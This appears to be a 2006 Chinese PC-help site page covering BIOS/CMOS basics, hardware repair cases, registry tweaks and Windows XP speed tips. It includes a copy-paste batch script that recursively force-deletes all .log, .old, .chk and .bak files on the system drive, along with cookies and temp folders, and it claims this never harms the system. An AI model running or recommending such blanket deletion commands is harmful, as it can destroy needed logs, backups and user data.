    BIOS中断服务程序实质上是微机系统中软件与硬件之间的一个可编程接口，主要用来在程序软件与微机硬件之间实现衔接。例如，DOS和Windows操作系统中对软盘、硬盘、光驱、键盘、显示器等外围设备的管理，都是直接建立在BIOS系统中断服务程序的基础上，而且操作人员也可以通过访问INT 5、INT 13等中断点而直接调用BIOS中断服务程序。

    2．BIOS系统设置程序

    微机部件配置记录是放在一块可读写的 CMOS RAM 芯片中的，主要保存着系统基本情况、CPU特性、软硬盘驱动器、显示器、键盘等部件的信息。在 BIOS ROM芯片中装有"系统设置程序"，主要用来设置CMOS RAM中的各项参数。这个程序在开机时按下某个特定键即可进入设置状态，并提供了良好的界面供操作人员使用。事实上，这个设置CMOS参数的过程，习惯上也称为" BIOS设置"。一旦CMOS RAM芯片中关于微机的配置信息不正确时，轻者会使得系统整体运行性能降低、软硬盘驱动器等部件不能识别，严重时就会由此引发一系统的软硬件故障。

    3． POST上电自检

    微机按通电源后，系统首先由POST（Power On Self Test,上电自检)程序来对内部各个设备进行检查。通常完整的POST自检将包括对 CPU、640K基本内存、 1M以上的扩展内存、ROM、主板、CMOS存贮器、串并口、显示卡、软硬盘子系统及键盘进行测试，一旦在自检中发现问题，系统将给出提示信息或鸣笛警告。

    4． BIOS系统启动自举程序

    系统在完成 POST自检后， ROM BIOS 就首先按照系统 CMOS设置中保存的启动顺序搜寻软硬盘驱动器及CD-ROM、网络服务器等有效地启动驱动器，读入操作系统引导记录，然后将系统控制权交给引导记录，并由引导记录来完成系统的顺利启动。

    CMOS是什么?

    CMOS(本意是指互补金属氧化物半导体存储嚣，是一种大规模应用于集成电路芯片制造的原料)是微机主板上的一块可读写的RAM芯片，主要用来保存当前系统的硬件配置和操作人员对某些参数的设定。CMOS RAM芯片由系统通过一块后备电池供电，因此无论是在关机状态中，还是遇到系统掉电情况，CMOS信息都不会丢失。

    由于CMOS RAM芯片本身只是一块存储器，只具有保存数据的功能，所以对CMOS中各项参数的设定要通过专门的程序。早期的CMOS设置程序驻留在软盘上的(如IBM的PC/AT机型)，使用很不方便。现在多数厂家将CMOS设置程序做到了 BIOS芯片中，在开机时通过按下某个特定键就可进入CMOS设置程序而非常方便地对系统进行设置，因此这种CMOS设置又通常被叫做BIOS设置。

BIOS设置和CMOS设置的区别与联系

    BIOS是主板上的一块EPROM或EEPROM芯片，里面装有系统的重要信息和设置系统参数的设置程序（BIOS Setup程序)；CMOS是主板上的一块可读写的RAM 芯片，里面装的是关于系统配置的具体参数，其内容可通过设置程序进行读写。CMOS RAM 芯片靠后备电池供电，即使系统掉电后信息也不会丢失。BIOS与CMOS既相关又不同：BIOS中的系统设置程序是完成CMOS参数设置的手段；CMOS RAM既是BIOS设定系统参数的存放场所，又是 BIOS设定系统参数的结果。因此，完整的说法应该是"通过BIOS设置程序对CMOS参数进行设置"。由于 BIOS和CMOS都跟系统设置密初相关，所以在实际使用过程中造成了BIOS设置和CMOS设置的说法，其实指的都是同一回事，但BIOS与CMOS却是两个完全不同的概念，千万不可搞混淆。


转接卡故障二例

《一键清理系统垃圾》

转接卡故障二例

    故障一：故障现象为每天启动时，总要按机箱上的电源开关无数次，基本上每次都只是电源指示灯闪动一下。间或有几次硬盘能响一阵子，显示器却毫无反应。但是如果启动了以后，机器所有的运行都很正常。但有时还会出现关机重启不动的现象。
    解决办法：首先想到的是电源问题。从运行正常的机器上换来电源试试，故障依然。看来电源不是问题所在。因开机时，有时显示器没有显示，把显卡用于其他机器，一切正常。看来主板存在问题，由于主板为Slot 1接口，赛扬466使用时必须配接转接卡，身边正好有块带转接卡的赛扬466，插在主板上之后，系统启动运行正常，再试多次也是如此。由此可排除CPU存在的问题，即故障一定出在转接卡。重新更换之后，系统不再出现以前的故障现象。
    故障二：故障表现为：启动运行一切正常，也从没出现什么蓝屏、黑屏现象。只是机器在运行一段时间后，总会出现屏幕僵死的现象，按鼠标、键盘、Power键都没有反应。运行程序一般能坚持2小时～3小时“不死”，玩游戏时，基本上坚持不了半个小时。有时按了Reset键后，还会出现机器不能启动，屏幕无显示；或硬盘响了一阵后自动关机的现象。
    解决办法：仍为“插拔法”，在多次试验后，换了一块“转接卡”，问题得以解决。
    把换下来的两块转接卡拿来一看，都是颜色暗淡，焊接点极不规则，看来是个真正的次品。因此提醒自己装机的各位朋友，在装机的过程中，不能忽视小小转接卡，它可是你机器心脏与“身体”间的桥梁啊！


自动关闭停止响应程序

《一键清理系统垃圾》

自动关闭停止响应程序

    在注册表中打开HKEY_CURRENT_USER\Control Panel\Desktop目录，把里面的AugoEndTasks键值改为1。
如果注册表中找不到AutoEndTasks键值，则可以自己建一个串值并把它改为这个名字，值设为1就可以了。


清除地址栏中的记录

《一键清理系统垃圾》

清除地址栏中的记录

    问：我在打开某个文件后，地址栏里总是留下该文件的详细路径，当我在地址栏里输入这个文件的上级路径时，就会自动弹出下拉菜单，包括与此相关的各个最近访问过的文件路径，很是烦人。请问能不能将它们清除呢？

    答：在“运行”中输入regedit打开注册表编辑器，找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer，添加一个名为“ClearRecentDocsOnExit”(不包含引号)的十六进制键，值为“01,00,00,00”，重新启动以后即可。每次重新登录都会清理一次。


自动释放系统资源

《一键清理系统垃圾》

自动释放系统资源

    在Windows中每运行一个程序，系统资源就会减少。有的程序会消耗大量的系统资源，即使把程序关闭，在内存中还是有一些没用的DLL文件在运行，这样就使得系统的运行速度下降。不过我们可以通过修改注册表键值的方法，使关闭软件后自动清除内存中没用的DLL文件及时收回消耗的系统资源。打开注册表编辑器，找到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer”主键，在右边窗口单击右键，新建一个名为“AlwaysUnloadDll”的“字符串值”，然后将“AlwaysUnloadDll”的键值修改为“1”，退出注册表重新启动机器即可达到目的。


阻止通电自动开机

《一键清理系统垃圾》

阻止通电自动开机

不少人经历过这样的事情：昨天还正常关机的，今天打开与电脑连接的插座上的电源开关，还没有按机箱电源按钮，电脑就已经开始自检了。还有的情况是，一将电脑电源插头插上插座，电脑也自动开启了。下面，我就这类问题与大家探讨一下。持不同意见者，欢迎来HTTP：//TIANYONG1.YEAH.NET上交流。
    笔者认为，上述问题可以通过两种方法解决：第一种方法是修改BIOS设置。第二种方法是合理使用电源插座。
        一、修改BIOS设置
    因为BIOS中的一些设置可以导致上述问题。在“INTEGRATED PHRIPHERALS SETUP”中，有个“PWRON After　PWR-Fail”的设置选项管理这个功能。其选项有三，分别为“On（开机）”、“Off（关机）”和“Former-Sts（恢复到到断电前状态）”。您应该将它设置为“Off”。这样在打开电源开关或停电后突然来电等情况下，电脑就不会自动启动了。
    我在联想奔月400商用电脑上测试的结果是：如果上述选项设置成“On”。在第一次打开机房电源总开关时，电脑自动开机。之后，打开该电脑所在插座开关多次并不能导致自动开机。但将插座电源开关关闭后，从插座上拔下机箱插头，此时打开插座电源，再插上插头就能让电脑自动开机；当该选项设置为“Off”后，故障消失。
    如果上述方法不奏效，可以继续尝试下面的修改：
    将BIOS中“POWER MANAGENT SETUP”的“Restore ac power loss”设置为“Disabled”。
    将BIOS中“POWER MANAGENT SETUP”的“PM Control by APM”设置为“Yes”。
    注意，个别BIOS版本与此不同，请参照具体的主板说明书。
        二、合理使用电源插座
    凡事都有利弊，即使是先进的技术。ATX电源给我们带来了软关机、自动收E-mail/传真、定时开机等方便，但也给电脑引进了不稳定的因素、比如空调、冰箱启动等导致自动开机的故障。因为ATX结构的电源启动是靠检测一个电容的电平信号来驱动的，而在按下电源插座开关的时候，插上机箱电源插头等等，都会产生一个短暂的冲击电流。这很容易引起ATX电源的误动作，使机器启动。
    因此，一方面我们要设置好BIOS，另一方面，我们应该尽量让电脑使用一个单独的插座，以避免其它电器的干扰。另外，ATX电源就是让电脑时刻准备着开机的。此时的功耗是很低的，没有必要再关闭插座电源。因为它的开关至少会影响显示器的寿命。


最简洁的数据库连接方法!(ACCESS数据库)

《一键清理系统垃圾》

返回总目录 上一页 目录页

最简洁的数据库连接方法!(ACCESS数据库)

<%
strconn = "DRIVER=Microsoft Access Driver (*.mdb);DBQ=" & Server.MapPath("数据库文件")

set　conn = server.createobject("adodb.connection")

conn.open strconn
%>


www.163164.com 常见系统故障 QQ 3149886

双击滚屏 单击停止

返回总目录

常见系统故障

◎【Windows】攻略大全
◎3D图形加速卡术语
◎AMD+VIA的一箩筐问题
◎at命令的用法
◎Award Flasher 5.33有什么新的功能？
◎Compaq电脑维修两例
◎folder.htt等文件的问题
◎found.000文件夹的问题
◎Ghost 使用详解
◎备份前的准备工作非常重要：
◎Google搜索引擎的十大应用
◎ID丢失的途径及如何防止ID被盗
◎js写入文字
◎Mfm1992文件问题
◎邹从静 传奇游戏 服务器 启动
◎Modem无法正常拨号故障分析
◎MP3常见故障解决
◎MSN小尾巴致系统不能登陆的修复
◎如何在win2000下安装mysql
◎NTFS分区格式转化成FAT32的几种方法
◎PNP无盘的快速安装方法
◎QQ号码被盗原因分析
◎Quadro4完全硬件改造之MX440篇
◎raid简介
◎Realone 解码器 FOR Windows Media Player
◎Regsvr32 用法和错误消息的说明
◎Regsvr32使用方法
◎Regsvr32命令修复系统故障
◎RUNDLL32.EXE 是什么程序
◎Rundll.exe 高级应用
◎
◎SFC使用方法
◎SF减少M2卡机的方法
◎SMART与菜鸟刻盘
◎STD 与 STR
◎UPS电池放电过量的恢复
◎USB存储设备无法识别
◎USB技术白皮书
◎VIA 4合1常见问题集
◎Windows9X注册表揭密
◎Windows 9x“致命异常错误”的解决方案
◎Windows 2003常见故障解决方法
◎
◎Windows常见错误代码解析
◎Windows常用命令集
◎Windows出错信息不完全解析
◎Windows出错信息解析及解决方案
◎Progman　程序管理器(可以运行程序)
◎巧妙安装各种Windows操作系统
◎Windows系统非法操作详解
◎windows下的EXE文件大揭密
◎Windows注册表详解
◎巧妙安装各种Windows操作系统
◎笔记本电脑电池引起的故障
◎笔记本电脑维修四例
◎笔记本密码破解
◎变废为宝-一次性硒鼓简单再生法
◎不用重装轻松解决Windows系统棘手问题
◎长城C-1475G数控彩显的维修
◎常见Windows故障全面排除方案（二）
◎常见Windows故障全面排除方案
◎常见打印故障及解决方法
◎常见投影机故障解决五例
◎常用系统进程及功能总览
◎传真机维修三例
◎磁盘的碎片整理
◎从Ghost误刷分区表说起
◎从受损软盘上抢救文件
◎带你认识防火墙技术
◎电磁干扰对Modem的影响
◎电脑操作误区面面观
◎电脑出现故障，没有过质保直接去找装机商，消费者没有任何义务寻找故障点
◎电脑的日常维护与故障诊断
◎电脑的维护与故障诊断
◎端口可分为3大类：
◎电脑故障维修判断指导大全（联想内部文件）
◎电脑关机故障速解
◎XP重装需要激活的问题
◎电脑维精华帖
◎电脑维修的基本方法
◎电脑维修精华帖3
◎解决插电即开机问题
◎音量为何会自动调节
◎电脑维修精华帖6
◎�?
◎电脑维修精华帖8
◎[系统]电脑应用常见问题集中贴
◎电脑维修步骤与维修xx作注意事项
◎电脑维修知识总结2
◎电脑维修步骤与维修xx作注意事项
◎电脑维修中的“八先八后”
◎电脑硬件资源的冲突与解决方法
◎调制解调器使用问题
◎对付“黑脸”八部曲
◎令我倒霉的是打开ie 就出现了一大窜的网页，真烦 在注册表把所有的连接都
◎飞利浦105A彩显──OSD控制旋钮故障的检修
◎Windows XP 控制台命令详解 - 辅助操作和特殊功能命令
◎复印机传送带的维修方法
◎Windows XP隔离组件和并列共享
◎个人电脑防雷措施
◎个人电脑用户的九大安全防范策略
◎更改临时文件夹的路径
◎更改屏幕保护程序关联方式
◎调整调出输入法的顺序
◎更改系统源文件途径
◎REGEDIT4
◎快速关闭没有响应的程序
◎红外接口DIY
◎花生壳新手教程
◎还原卡惹麻烦
◎恢复“开始”菜单中的“运行”
◎机箱去静电法
◎计算机变慢的十大原因
◎计算机故障总汇
◎计算机无法加电是何故
◎Windows XP减肥加速系列--------加速篇
◎Windows XP减肥加速系列--------减肥篇（1）
◎教你如何安装操作系统？
◎教你如何一步一步检修电脑硬件故障
◎解读引导文件BOOT.INI
◎A盘不见的解决方法
◎EXE文件关联丢失的解决方法
◎解开被锁定的.reg与.inf文件
◎部分软件无法安装
◎解决插电即开机问题
◎解决窗口按钮上乱码问题
◎注册表文件不出现确认对话框
◎多系统安装
◎回收站无法清空
◎解决活动窗口按钮被改写
◎操作系统停止响应
◎解决开机ESCD错误
◎开始菜单响应速度过慢
◎解决控件提示问题
◎解决某些网页不能访问
◎任务栏的图标变大了
◎解决“添加删除程序”里面隐藏问题
◎win98图标老乱套，与文件类型不配，
◎网页恶意代码的十一大危害及其解决方案
◎找回Administrator账户密码
◎"文件保护"的解决方法
◎双击无法打开文件夹
◎解决无法关机问题
◎无法升级更新
◎系统无法自动保存设置
◎解决系统声音不正常
◎解决系统托盘区的图标丢失
◎系统无法自动保存设置
◎解决系统资源不足问题
◎解决系统资源严重不足
◎解决限制使用应用程序问题
◎音量为何会自动调节
◎应用程序不能启动
◎加快右键菜单的响应速度
◎解决右键发送到问题
◎解决桌面图标乱的方法
◎进程名解释
◎进入休眠状态以后不能唤醒故障一例
◎警惕电脑杀手——灰尘
◎静电造成的故障三例
◎静电造成的故障三例
◎开始→运行→输入的命令集锦
◎刻录秘技
◎控制面板大全
◎Win XP控制台命令详解
◎宽带安装和使用问题集粹
◎来自联想维修站的内部发行资料2
◎来自联想维修站的内部发行资料
◎利用注册表来防止设置的随意更改
◎连重装也解决不了的Modem故障
◎漫谈Modem速度
◎墨粉虚警现象与处理
◎目录和文件操作命令
◎你真的会安装驱动顺序吗？
◎排除Modem使用中的故障
◎排除烦人的Windows Installer故障
◎喷打计数器清零
◎喷打加墨后的常见故障处理
◎奇怪的花屏现象
◎清洁电脑的几个误区
◎驱动程序安装顺序
◎取消磁盘扫描
◎取消磁盘扫描前的等待时间
◎让你的IIS无懈可击
◎如何彻底删除输入法文件
◎如何打开注册表编辑器（从Win98到WinXP）
◎如何防止恶意网页篡改注册表
◎如何关闭Dr.Watson
◎如何看电影、下载电影以及一些必备工具和常识
◎如何清除冰河
◎如何让注册表保持在根目录
◎如何实现关机时清空页面文件
◎如何使用Tasklist命令
◎如何使用系统还原
◎如何锁住桌面背景
◎如何挽救已受物理损坏的软盘中的文件
◎教你如何一步一步检修电脑硬件故障
◎如何移动收藏夹
◎如何隐藏磁盘驱动器
◎如何直接移动应用程序
◎软盘常见故障及对策
◎三星COMBO-------时尚首选
◎散热风扇的维修
◎扫描仪常见故障快速排除
◎Windows XP下扫描仪的安装和使用
◎扫描仪的工作原理、性能及应用（二）
◎扫描仪的工作原理、性能及应用（一）
◎扫描仪的维护
◎扫描仪历险记
◎色带的故障及解决办法
◎删除NTFS分区
◎删除屏幕保护和壁纸
◎删除“添加/删除程序”中的无效信息
◎删除系统备份文件
◎删除信使服务
◎删除隐藏不活动的图标
◎闪存式MP3的常见故障及处理方法
◎闪盘无法卸载究竟为什么
◎设置窗口自动刷新
◎设置开始菜单中的用户名
◎设置任务管理器
◎慎用还原Wpa.dbl文件来达到使WindowsXP永远激活的目的
◎施乐XEROX 1027复印机故障维修六例
◎什么时信使服务
◎什么是 DirectX
◎什么是host表
◎什么是kernel32内核文件
◎什么是POP3
◎什么是Smartdrv程序
◎丢包
◎端口概念
◎什么是软件版本标志
◎VFAT (Virtual File Allocation Table)
◎使用AT命令调试MODEM
◎使用GHOST时的几个常见问题
◎使用PartitionMagic中途断电后的数据恢复方法
◎视频播放的新问题全面解析
◎视频故障处理解答四例
◎在注册表中
◎数据破坏后的正常恢复
◎双系统安装方法
◎双系统的安全卸载
◎双系统问题集合
◎睡眠”不醒的罪魁祸首
◎透彻观察宽带故障
◎突破NTFS读写权限
◎微软提供的超级大餐
◎为文件夹添加背景音乐
◎我的电脑内不可改名的方法
◎无盘/终端教案
◎无盘Windows 2003安装指南
◎系统的维护
◎Windows XP 控制台命令详解
◎系统资源泄漏的问题和对策
◎限制驱动器的使用
◎详解Windows操作系统帐户权限设置
◎
◎芯片级维修手记
◎修复注册表两法
◎移动存储故障分析
◎疑难杂症综合诊治系列（二）
◎疑难杂症综合诊治系列（六）
◎疑难杂症综合诊治系列（七）
◎疑难杂症综合诊治系列（三）
◎疑难杂症综合诊治系列（四）
◎疑难杂症综合诊治系列（五）
◎疑难杂症综合诊治系列（一）
◎隐藏控制面板中的选项
◎隐藏驱动器一法
◎隐藏添加删除程序
◎隐藏桌面‘回收站’的两个方法
◎隐藏桌面所有图标
◎影音视频播放中出现的常见问题集锦
◎安装 Windows XP 后硬件不兼容的处理
◎硬件冲突”的检查处理方法
◎硬件学堂之---谈超频的概念及方法
◎硬件疑难杂症综合诊治系列（八）
◎硬件诊室
◎硬件诊室
◎硬件诊室
◎硬件诊室
◎硬件诊室
◎硬件知识
◎拥有一台安静的电脑
◎用Ghost还原主引导记录
◎由Reset键引发的故障
◎由Reset键引发的故障
◎运行菜单中的“快捷方式”
◎运行命令
◎
◎
◎找回“显示桌面”按钮
◎找回丢失的桌面图标透明效果
◎重装操作系统20条"原则"【必看】
◎重装系统失败的原因
◎注册表及其备份与恢复
◎注册表修复不成功的原因
◎注册表修改指南（一）
◎注册表由来
◎注册码、序列号！！！值得收藏！！！
◎专家答问1
◎转接卡故障二例
◎自动关闭停止响应程序
◎清除地址栏中的记录
◎自动释放系统资源
◎阻止通电自动开机
◎最简洁的数据库连接方法!(ACCESS数据库)

当前版本：2006-11-28 www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！ 收藏本站

返回总目录


30秒清除你电脑中的垃圾

《一键清理系统垃圾》

返回总目录

30秒一键清理你电脑中的垃圾

30秒一键清理你电脑中的垃圾（使你电脑急速如飞）(高手已测）
要轻松流畅上网你是否注意到你的电脑系统磁盘的可用空间正在一天天在减少呢？是不是像老去的猴王一样动作一天比一天迟缓呢？

  没错！在Windows在安装和使用过程中都会产生相当多的垃圾文件，包括临时文件（如：*.tmp、*._mp）日志文件（*.log）、临时帮助文件（*.gid）、磁盘检查文件（*.chk）、临时备份文件（如：*.old、*.bak）以及其他临时文件。特别是如果一段时间不清理IE的临时文件夹“Temporary Internet Files”，其中的缓存文件有时会占用上百MB的磁盘空间。这些LJ文件不仅仅浪费了宝贵的磁盘空间，严重时还会使系统运行慢如蜗牛。这点相信你肯定忍受不了吧！所以应及时清理系统的LJ文件的淤塞，保持系统的“苗条”身材，轻松流畅上网！朋友来吧，现在就让我们一起来快速清除系统垃圾吧！！下面是步骤很简单就两步！

   在电脑屏幕的左下角按“开始→程序→附件→记事本”，把下面的文字复制进去（黑色部分），点“另存为”，路径选“桌面”，保存类型为“所有文件”，文件名为“清除系统LJ.bat”，就完成了。记住后缀名一定要是.bat，ok！你的垃圾清除器就这样制作成功了！
双击它就能很快地清理垃圾文件，大约一分钟不到。

如果怕麻烦，直接下载已整理好的《一键清理》程序，保持系统的“苗条”身材与运行速度！

======就是下面的文字(这行不用复制)=============================

@echo off
echo 正在清除系统垃圾文件，请稍等......
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
echo 清除系统LJ完成！
echo. & pause

=====到这里为止(这行不用复制)==============================================
以后只要双击运行该文件，当屏幕提示“清除系统LJ完成！就还你一个“苗条”的系统了！！到时候再看看你的电脑，是不是急速如飞呢？可别忘了回帖喔！

注：LJ就是垃圾的意思！这招比那些所谓的优化大师好用！最重要的是无论在公司默认的系统环境还是在自己家中的电脑都不会破坏系统文件

如果怕麻烦，直接下载已整理好的《一键清理》程序，保持系统的“苗条”身材与运行速度！

当前版本：2006-12-13 www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


23招打造极速WINXP

《一键清理系统垃圾》

返回总目录 目录页 下一页

23招打造极速WINXP

往我们经常使用"碎片整理"使Windows运行的更快.但现在市场上出售的7200转硬盘，在寻道和传输两方面做了改进，有很多型号还附带有一个8M缓存，而且WinXP使用的NTFS文件系统比FAT系统更有效率。因此，"碎片整理"对提升电脑性能的作用已经非常有限。下面给出能够大幅提升电脑性能，让WinXP运行更快捷 、更可靠的23招实用技巧，希望对您有所帮助 ：

    1)在系统中安装Ultra-133硬盘加速扩充卡或带有8M缓存的ATA硬盘，可以有效减少系统的启动时间。

    2)把内存增加到512M以上。

    3)确定Windows XP使用的是NTFS文件系统。检查方法 ：双击"我的电脑"，在C ：盘上右击鼠标，选择"属性"，检查文件系统的类型。如果是FAT32，就把它转换成NTFS，方法是 ：先备份所有重要的数据，然后选择"开始"菜单里的"运行"，输入CMD后确认。在提示符下，输入CONVERT C ： /FS ：NTFS和回车。在这个过程中，最好不要中途异常中断，并确保系统中没有病毒。

    4)关闭文件索引功能。Windows索引服务要从硬盘上大量文件中提取信息并创建"关键字索引"，如果硬盘上有数以千计的文件，这个功能可以加快从这些文件中搜索信息的速度。但Windows创建这个索引要花费很多时间，而且大多数人从来不使用这个功能。关闭的方法是 ：双击"我的电脑"，在硬盘和下面的子文件夹上右击鼠标，选择"属性"，取消"使用索引以便快速查找文件"。如果有警告或错误信息出现(如"拒绝访问")，点击"忽略"即可。

    5)升级主板和显卡的驱动程序，升级BIOS。

    6)每三个月左右清空Windows的预读取文件夹(Windows\Prefetch)一次。Windows把频繁使用的数据存放在预读取文件夹中，需要再次使用这些数据时就可以大大加快读取速度。但时间一长，这个文件夹中就会有大量不再使用的垃圾数据存在，反而增加了Windows的读取时间，影响了系统性能。

    7)每个月运行一次磁盘清理程序，删除临时和无用文件。方法 ：双击"我的电脑"，在C ：盘上右击鼠标，选择"属性"，点击"磁盘清理"按钮。

    8)在"设备管理员"中双击IDE ATA/ATAPI控制器，到Primary/Secondary IDE Channel里将所有连接设备的转输模式都设定为使用DMA(如果可用)。

    9)更新接线.采用了新式的硬盘后，应该同时为所有IDE设备换装80线的Ultra-133线缆。如果只安装一个硬盘，那么这个硬盘应该安装在线缆的顶端，不要安装在线缆中间的那个接口，否则可能发生信号异常。对于Ultra DMA硬盘驱动器来说，这些异常信号会影响驱动器发挥最佳性能。

    10)清除所有spyware(间谍程序)。有很多免费软件，如AdAware，可以完成这个任务。清除后，所以包含spyware的软件都将不能正常工作，如果确实需要其中的某个软件，就把它重新安装一遍吧。

    11)从启动组里删除不必要的程序。方法 ：选择"开始"菜单里的"运行"，输入"msconfig"，进入"启动"选项卡，取消不想在系统启动时加载的项目。对于不能确定的项目，查阅一下"WinTasks Process Library"(进程库)，里面包含了已知的系统进程、应用程序和spyware的描述。也可以在google等WEB搜索引擎中查找。

    12)进入控制面板中的"增加/删除程序"项，删除不必要的和不用的程序。

    13)关闭所有不必要的动画和活动桌面。方法 ：在控制面板中点击"系统"图标，进入"高级"选项卡，对"性能"进行"设置"，在"视觉效果"选项卡上， 选中"自定义"单选框，将有关用户界面特性设定为禁用状态。

    14)使用Tweak-XP软件编辑系统注册表，进一步提升性能。

    15)定期访问微软Windows更新站点，下载所有标有"Critical(重大)"标志的更新项目。

    16)每周更新防病毒软件。系统中最好只安装一套防病毒软件，安装多套软件会对性能带来不利影响。

    17)安装的字体数量不要超过500种，字体数量太多会使系统变慢。

    18)不要对硬盘分区。Windows XP的NTFS文件系统在一个比较大的分区上运行会更有效率。以前，人们为了方便数据组织或重新安装操作系统时不必格式化整个硬盘而对硬盘进行分区。在Windows XP的NTFS文件系统中，重新安装操作系统已不必重新格式化分区，数据组织更可以通过文件夹来完成。例如，不需要再把大量的数据放到另外划分的D ：盘上，可以创建一个命名为"D盘"的文件夹，数据放在这个文件夹中即不影响系统性能，又能起到很好的组织作用。

    19)测试内存条(RAM)是否完好。建议使用免费程序MemTest86，先用这个程序制作一个启动盘，用此盘启动电脑后程序将对内存条运行10项不同的测试，每项测试进行3遍。如果测试中遇到错误，就关闭电脑，拔掉其中一根内存条(如果有多根的话)，重新测试。仍掉坏的内存条，换上一根好的。

    20)如果电脑上安装了CD或DVD刻录机，有时候升级驱动程序可以使刻录速度更快。

    21)取消不必要的服务。Windows XP调用了许多用户可能根本用不到的服务，这些服务不仅影响运行速度，对保护系统安全也非常不利。因此，可以根据需要禁用不必要的系统服务。方法 ：选择"开始"菜单里的"运行"，输入"Services.msc"打开"服务管理控制台"，通过更改服务的启动类型启动或停止该项服务。

    22)如果感觉Windows的单窗口浏览器速度比较慢，可以加以改进，方法是 ：打开"我的电脑"，点击"工具"->"文件夹选项"->"查看"，选中"使用独立的进程打开文件夹窗口"。这样可以防止一个较慢的设备影响用户界面的响应速度。

    23)打开机箱，把灰尘和碎片打扫干净，每年至少做一次。同时检查一下所有的风扇是否工作正常，主板上的电容器有没有膨胀或泄漏。

    至此，23招都用过一遍，是不是对自己的系统更满意了?

    提醒 ：虽然"碎片整理"对提升电脑性能作用有限，但一个没有碎片的硬盘总比一个布满碎片的硬盘消耗的功率少，况且，一旦硬盘损坏，如果硬盘上的数据连续存放，就更容易恢复.所以，仍建议每隔一段时间(根据机器使用情况，从数月到一年不等)，对硬盘做一次"碎片整理"。


Explorer.exe程序在系统中的作用

《一键清理系统垃圾》

Explorer.exe程序在系统中的作用

凡是Windows系列的操作系统，运行时都会启动一个名为Explorer.exe的进程。这个进程主要负责显示系统桌面上的图标以及任务栏，它在不同的系统中有不同的妙用。

    Windows 9x中的应用

    在Windows 9x中，这个进程是运行系统时所必需的。如果用“结束任务”的方法来结束Explorer.exe进程，系统就会刷新桌面，并更新注册表。所以，我们也可以利用此方法来快速更新注册表。方法如下：

    按下Ctrl+Alt+Del组合键，出现“结束任务”对话框。在该对话框中选择“Explorer”选项，然后单击“结束任务”按钮，将出现“关闭Windows”对话框。单击“否”按钮，系统过一会儿将出现另一个对话框，告诉你该程序没有响应，询问是否结束任务。单击“结束任务”按钮，则更新注册表并返回Windows 9x系统环境中。这比起烦琐的重新启动过程要方便多了？

    Windows 2000/XP中的应用

在Windows 2000/XP和其他Windows NT内核的系统中，Explorer.exe进程并不是系统运行时所必需的，所以可以用任务管理器来结束它，并不影响系统的正常工作。打开你需要运行的程序，如记事本。然后右击任务栏，选择“任务管理器”，选中“进程”选项卡，在窗口中选择Explorer.exe进程，单击“结束进程”按钮，，接下来桌面上除了壁纸(活动桌面Active Desktop的壁纸除外)，所有图标和任务栏都消失了。此时你仍可以像平常一样操作一切软件。

如果你想运行其他软件，但此时桌面上空无一物，怎么办？别着急，下面有两种可以巧妙地打开其他软件：

    第一种方法：按下Ctrl+Alt+Del组合键，出现“Windows安全”对话框，单击“任务管理器”按钮(或是直接按下Ctrl+Shift+Esc组合键)，在任务管理器窗口中选中“应用程序”选项卡，单击“新任务”，在弹出的“创建新任务”的对话框中，输入你想要打开的软件的路径和名称即可。

    你还可以在正在运行的软件上，选择“文件→打开”，在“打开”对话框中，点击“文件类型”下拉列表，选择“所有文件”，再浏览到你想打开的软件，右击它，在快捷菜单中选择“打开”命令，就可以启动你需要的软件了。注意，此时不能够通过单击“打开”按钮来打开软件，此种方法适用于大多数软件，Office系列除外。
通过结束Explorer.exe进程，还可以减少4520KB左右的系统已使用内存，无疑会加快系统的运行速度，为资源紧张的用户腾出了宝贵的空间。

    提示：重新启动Explorer.exe进程后，有些软件在任务栏系统托盘的小图标会消息，但该软件还是在正常运行当中。如果觉得有些不方便，可以再次打开该软件来显示小图标。


Win2k/XP注册表终极备份与恢复手册

《一键清理系统垃圾》

Win2k/XP注册表终极备份与恢复手册

    注册表是Windows的神经系统，掌握着电脑的“生杀大权”，但它也很脆弱，Windows经常因为它出了问题而导致彻底崩溃，因此，如果备份和恢复注册表就成了所有电脑用户的必修课，以前Windows 98的注册表备份大家已经了解很多了，但Windows 2000/XP却很少有权威的方法。

    注册表文件在哪里?
    Windows 2000/XP注册表文件存储于“WINNT\system32\config”文件夹，其中包括“Default”、“SAM”、“Security”（Windows 2000无此文件）、“Software”和“System”五个文件。

    用户配置文件为“NTUSER.dat”，它存储于“C:\Documents and Settings\用户名”文件夹，Windows 2000默认以“Administrator”内置系统管理员登录系统，而Windows XP则相反，用户需要创建自己的账户登录系统。（以下操作以Windows 2000为例说明）

    实例：修改其他用户的注册表文件

    通常情况下，我们只能对当前登录用户的注册表进行修改。一旦对注册表进行了误操作，造成系统无法启动，我们就无法进入注册表编辑器进行恢复。在这种情况下，我们可以以另一个用户的身份登录，在注册表编辑器中修改原来用户的注册表。

    方法如下：打开注册表编辑器，选择[HKEY_USERS]，点击“文件→导入注册表文件”，打开“C:\Documents and Settings\用户名”文件夹下的NTUSER.DAT文件，然后按“打开”，会弹出对话窗口要求输入用户名称，在[HKEY_USERS]下便多了一个刚才输入的文件夹，这个文件夹便是所需修改的用户注册表文件，修改完毕后选中刚才输入用户名的文件夹，然后按“文件→卸载注册表文件”即可。

    打造注册表自动备份系统

    第一步：准备好顺手的工具

    ERUNT是一个简单易用的Windows NT/2000/XP注册表备份工具，下载后将其解压缩到C盘根目录的“erunt”文件夹中。这样，运行其中的ERUNT.EXE，出现图1的画面，其中文件路径是要备份的文件夹，修改好之后按下“OK”即可开始备份。

    今后希望恢复注册表时，只要进入备份文件夹，双击其中的“ERDNT.EXE”，然后单击“OK”即可恢复注册表。

    ERUNT小档案
    软件版本:1.1.g 软件大小:461KB
